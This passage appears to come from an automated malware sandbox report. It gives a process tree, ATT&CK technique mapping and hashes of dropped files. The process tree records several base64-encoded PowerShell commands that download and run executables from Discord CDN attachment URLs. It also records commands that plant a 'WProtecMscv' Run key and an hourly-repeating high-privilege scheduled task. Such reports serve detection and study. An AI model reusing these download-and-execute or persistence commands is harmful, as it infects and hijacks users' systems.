        "cmd" /C C:\Users\Admin\AppData\Local\Temp\dSRkUrgMFv.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\dSRkUrgMFv.exe
        
        C:\Users\Admin\AppData\Local\Temp\dSRkUrgMFv.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAawB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA4ADgAMQA4ADIAMQA2ADMAMAA1ADQANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGgAcgBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBxAHoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBtAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQApADwAIwBnAHYAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAHEAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAB4AGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQA8ACMAbQBhAGMAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
        
        C:\Users\Admin\AppData\Roaming\5.exe
        
        "C:\Users\Admin\AppData\Roaming\5.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1612
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\tWut9PTgX5.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\tWut9PTgX5.exe
        
        C:\Users\Admin\AppData\Local\Temp\tWut9PTgX5.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeABjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA5ADQAMAA0ADMANwAwADQANQAyADcAOAAvAGwAaQBlAG8AZABvAGMAZQBtAHAALgBlAHgAZQAnACwAIAA8ACMAdABiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AHgAbQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAHQAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAGoAawBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAcwB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGcAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApADwAIwBkAGwAcwAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
        
        C:\Users\Admin\AppData\Roaming\6.exe
        
        "C:\Users\Admin\AppData\Roaming\6.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2032
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\KOVSiCQjEa.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\KOVSiCQjEa.exe
        
        C:\Users\Admin\AppData\Local\Temp\KOVSiCQjEa.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA2ADYANQAzADEANgA0ADAAOAA4ADEAMwA5ADgAMQA3AC8AMQAwADUANgA2ADUAMwA5ADUAMwA4ADAAMAAwADkAMwA4ADQANgAvAFcAUAByAG8AdABlAGMATQBzAGMAdgAuAGUAeABlACcALAAgADwAIwBtAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGgAbABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AdQB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADcALgBlAHgAZQAnACkAKQA8ACMAcQBzAHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwB0AHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAdABpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADcALgBlAHgAZQAnACkAPAAjAHQAZwBnACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1848
        
        C:\Users\Admin\AppData\Roaming\7.exe
        
        "C:\Users\Admin\AppData\Roaming\7.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WProtecMscv' -Value '"C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \WProtecMscv /tr "C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \WProtecMscv /tr "C:\Users\Admin\AppData\Roaming\WProtecMscv\WProtecMscv.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:980
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:4856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\w47Z6QOWuW.exe
        6⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\w47Z6QOWuW.exe
        
        C:\Users\Admin\AppData\Local\Temp\w47Z6QOWuW.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADYANgA1ADMAMQA2ADQAMAA4ADgAMQAzADkAOAAxADcALwAxADAANQA2ADYANQAzADYAOAA5ADIANQAyADcANgAxADcAMgAxAC8AcABsAGwAbQBtAGQAaQBpAHAAbQAuAGUAeABlACcALAAgADwAIwB5AGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdQBhACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAZgBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADgALgBlAHgAZQAnACkAKQA8ACMAdgBkAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADgALgBlAHgAZQAnACkAPAAjAG0AbgBxACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:360
        
        C:\Users\Admin\AppData\Roaming\8.exe
        
        "C:\Users\Admin\AppData\Roaming\8.exe"
        9⤵
        Executes dropped EXE
        
        PID:2448
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\4bgciL2q05.exe
        6⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\4bgciL2q05.exe
        
        C:\Users\Admin\AppData\Local\Temp\4bgciL2q05.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAYwB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADYANgA1ADMAMQA2ADQAMAA4ADgAMQAzADkAOAAxADcALwAxADAANQA2ADYANQAzADkANwAyADIANgA3ADYAMQA4ADMAMgA0AC8ASABEAFMAWQAyADEAVQAuAGUAeABlACcALAAgADwAIwByAHQAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAbgBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAZQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADkALgBlAHgAZQAnACkAKQA8ACMAZABjAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQB3AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADkALgBlAHgAZQAnACkAPAAjAGcAbAB1ACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Users\Admin\AppData\Roaming\9.exe
        
        "C:\Users\Admin\AppData\Roaming\9.exe"
        9⤵
        Executes dropped EXE
        
        PID:4016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 804
        10⤵
        Program crash
        
        PID:1268
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\CuJy5ycumB.exe
        6⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\CuJy5ycumB.exe
        
        C:\Users\Admin\AppData\Local\Temp\CuJy5ycumB.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:1072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAegB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADYANgA1ADMAMQA2ADQAMAA4ADgAMQAzADkAOAAxADcALwAxADAANQA2ADYANQA0ADAAMQA0ADAAOQA3ADQAMAA0ADAAMAA0AC8ATgBDAE4AWABKADIALgBlAHgAZQAnACwAIAA8ACMAbABmAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AHYAdAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHgAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAKQA8ACMAbgB2AHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABwAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMAAuAGUAeABlACcAKQA8ACMAYwB1AGQAIwA+AA=="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1056
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\QbFMU9R2KB.exe
        6⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\QbFMU9R2KB.exe
        
        C:\Users\Admin\AppData\Local\Temp\QbFMU9R2KB.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADYANgA1ADMAMQA2ADQAMAA4ADgAMQAzADkAOAAxADcALwAxADAANQA2ADYANQA0ADAANgAyADgANwAyADkANgA5ADMANwA2AC8AdwByAGEAcgByAHMALgBlAHgAZQAnACwAIAA8ACMAYgB3AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AG4AYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAGkAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADEALgBlAHgAZQAnACkAKQA8ACMAZwBwAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBpAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHAAZABwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMQAuAGUAeABlACcAKQA8ACMAcQBpAG4AIwA+AA=="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3216

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4228 -ip 4228
1⤵
PID:1936

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
1⤵
- Executes dropped EXE
PID:1880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4016 -ip 4016
1⤵
PID:4812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2.exe.log

Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
51ac5e85a2a5d90e06821327dbdb0e8a

SHA1
b12ebae76431d6cc91338de119264b060af1874e

SHA256
94f9b8257253dca54da6d5e1daf024acc4177b809bd69fd9acb9d533f6a8dc4f

SHA512
728b0f6f611cba341c47100faf55ff5ae6e3bd17150841ce015541d1479959486bc7c04c14bd7e5e84e8888a0a868aa7312b9933cbd82758a754bf8267978276

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
e806443dc384b02701b258cfa4583932

SHA1
ceea4d6536e8b1bc10c3d9ac02cec51c53b57e96

SHA256
45502ae553bd39208d9a7b10646edd15a674b9586a310b497446d9194a6016f9

SHA512
3eda609eb5cb2eb6d1d297ade881388956ff638c6b7c905727e419a4ecc9c5100547d6e1dc5f5dc3df9de4a6fc6891f9c9c3989a390bf489ceadace74f2eb5ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1ac91b5cbaee1716597f815b59fc04d6

SHA1
06a81b1c3f692d18b9b8a2ac396beef5db89da4f

SHA256
5eab192250ef11a9c0c8dcc67101290a7dd6c56eaca4f0c937a90e5dbd115ecb

SHA512
d8190b750758928bf0459237306cf175385c0c2f3d633ab2bffe1f4a3b5d90d59412d9ed57f45ffeb071b3a2fb601606c02432f4fcff9bdb3b0dd74dbb929ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d0c6056e0fb8aed7b32c7a592d0ee897

SHA1
9721fdbeaf2ac95856ee5544ef742d64f35e60f0

SHA256
38429492bd95fd8f8d7271bfe80e6b26e9e142a8f36c2562cbb878dc633dc1aa

SHA512
320aa47020f63e854daac281b7b8eb337a2d79804016cc0a09405edf9953559482d23e2044b09e98478c181715dafd3c5f8566da0b89790ef03068f062ebd780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
affb533afd518ad343800a0868062ca7

SHA1
795af694569e97c942fc8184eb31a01ffb2354ad

SHA256
858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

SHA512
6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2a9e8bbd35a799439bfb3719fc0c0b71

SHA1
ff9f125fe567345f36f10efe6d23537f5c4e5d70

SHA256
55e3fea352421679736630788d3c065897a45753bf3e21ec0e80cb13eb359e17

SHA512
c4bdb9ebe1a674c36c05681fb38b09630d84063546d52f50b6cc8375a4aa63cc8e12c68bde35fcfcf842c3bb0b59e727d9d49af59a05aee2c410de066a3c0ce2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6500224947206fab25690397fca489e

SHA1
8f61dd35d00c5dcc990fb2840982841545b2d953

SHA256
846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

SHA512
aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
00e58f368649eca5caa1a16e72386a57

SHA1
1c5e0dc46d6bba4ddd8e3ce4e2aca83950434635

SHA256
c4c309d45ade44494c6f586774623c99621a7cda17a743aa0ba82a23850ccba7

SHA512
37bcc4171624838457d146b21157eb2771d94637a3b89f57ab2fcf9be10baff16ef9fc97cf77fb6bf9490806561be5c36c3ab52553cd57d9d872d26e89defaa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
3849bba366134a2553a6c1f77f2ad17b

SHA1
9bd9c549bbc48239da1fe1bb8da79e563afc98a1

SHA256
1f1c42450a44e9cbd112572924d3ecd8da99c2ed848df0beb0c7c10c60faf85b

SHA512
4d2b8fb3978d55fe99a5068bb9b86a42d1a3a6f78fe006120e4c410adfff91cd2b028d06b852d806faeb01c004a308036902bbe30d3f8ce27fd17cfa10a6cdaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
3849bba366134a2553a6c1f77f2ad17b

SHA1
9bd9c549bbc48239da1fe1bb8da79e563afc98a1

